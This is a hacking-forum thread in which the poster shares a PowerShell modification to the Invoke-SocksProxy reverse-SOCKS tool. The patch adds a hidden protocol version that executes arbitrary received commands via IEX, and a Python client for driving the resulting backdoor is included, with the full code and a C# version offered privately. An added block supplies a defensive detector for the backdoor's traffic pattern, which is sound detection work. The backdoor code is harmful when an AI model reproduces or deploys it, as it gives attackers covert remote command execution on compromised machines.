[Reverse socks] Github project improvement for RCE
by guilimix - October 19, 2020 at 09:35 AM
#1
Very useful tool for reverse socks in powershell: https://github.com/p3nt4/Invoke-SocksProxy

Doesn't have command exec, here is my hack to add this feature:

modify Invoke-SocksProxy.psm1 to add a "Socks 6" version handling

if ($socksVer -eq 6){
        $lencmd=[int]$buffer[1];
        $data = New-Object System.Byte[] $lencmd;
        $cliStream.Read($data,0,$lencmd) | Out-Null;
        $res=IEX([system.Text.Encoding]::UTF8.GetString($data));
        $cliStream.Write([system.Text.Encoding]::UTF8.GetBytes($res+"--MAGIC-TOKEN--"));
}


and here is the python file to talk to this new backdoor:

import socket, sys
HOST = sys.argv[1] # usually 127.0.0.1
PORT = int(sys.argv[2])
COMMAND=sys.argv[3]

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.send(b'\x06'+bytes([len(COMMAND)])+COMMAND.encode("utf-8"))
    data = b""
    while data.decode("utf-8").count("--MAGIC-TOKEN--")<1:
        data += s.recv(2014)
    print(data.replace(b"--MAGIC-TOKEN--",b"").decode("utf-8"))



MP me for the full code; a C# version is also available.
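A defender-side check for the protocol shape described in this post (added example; not code from the post or from the Invoke-SocksProxy project). Legitimate SOCKS clients open with version byte 0x04 or 0x05, so a first byte of 0x06 followed by a length-prefixed command, or a proxy reply carrying --MAGIC-TOKEN--, identifies the modified proxy; the sample flows below are constructed, not captured traffic.

```python
MAGIC_TOKEN = b"--MAGIC-TOKEN--"   # output delimiter used by the modified proxy above
STANDARD_SOCKS_VERSIONS = {0x04, 0x05}


def inspect_client_hello(payload: bytes) -> dict:
    """Classify the first client-to-proxy bytes of a connection.

    Real SOCKS clients start with version 0x04 or 0x05. The patched
    Invoke-SocksProxy also accepts 0x06, a one-byte length and a UTF-8
    command, so that shape is reported as suspicious.
    """
    if not payload:
        return {"verdict": "empty"}
    version = payload[0]
    if version in STANDARD_SOCKS_VERSIONS:
        return {"verdict": "socks", "version": version}
    if version == 0x06 and len(payload) >= 2:
        length = payload[1]
        command = payload[2:2 + length].decode("utf-8", errors="replace")
        return {
            "verdict": "suspicious",
            "version": 6,
            "reason": "non-standard SOCKS version followed by a length-prefixed command",
            "command": command,
        }
    return {"verdict": "unknown", "version": version}


def response_has_backdoor_marker(payload: bytes) -> bool:
    """True if proxy-to-client data carries the backdoor's output delimiter."""
    return MAGIC_TOKEN in payload


def scan_flows(flows):
    """Apply both checks to (client_bytes, server_bytes) pairs and collect alerts."""
    alerts = []
    for idx, (client_bytes, server_bytes) in enumerate(flows):
        hello = inspect_client_hello(client_bytes)
        if hello["verdict"] == "suspicious":
            alerts.append((idx, "client", hello["reason"], hello["command"]))
        if response_has_backdoor_marker(server_bytes):
            alerts.append((idx, "server", "backdoor output delimiter seen", None))
    return alerts


# Constructed sample flows for the demonstration (not captured traffic)
SAMPLE_FLOWS = [
    (b"\x05\x01\x00", b"\x05\x00"),                          # normal SOCKS5 greeting
    (b"\x06\x06whoami", b"host\\user\r\n--MAGIC-TOKEN--"),  # patched proxy's RCE path
]

if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print(alert)
```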
#2
Great! Thanks mate for this share!
#3
nice one, thanks for sharing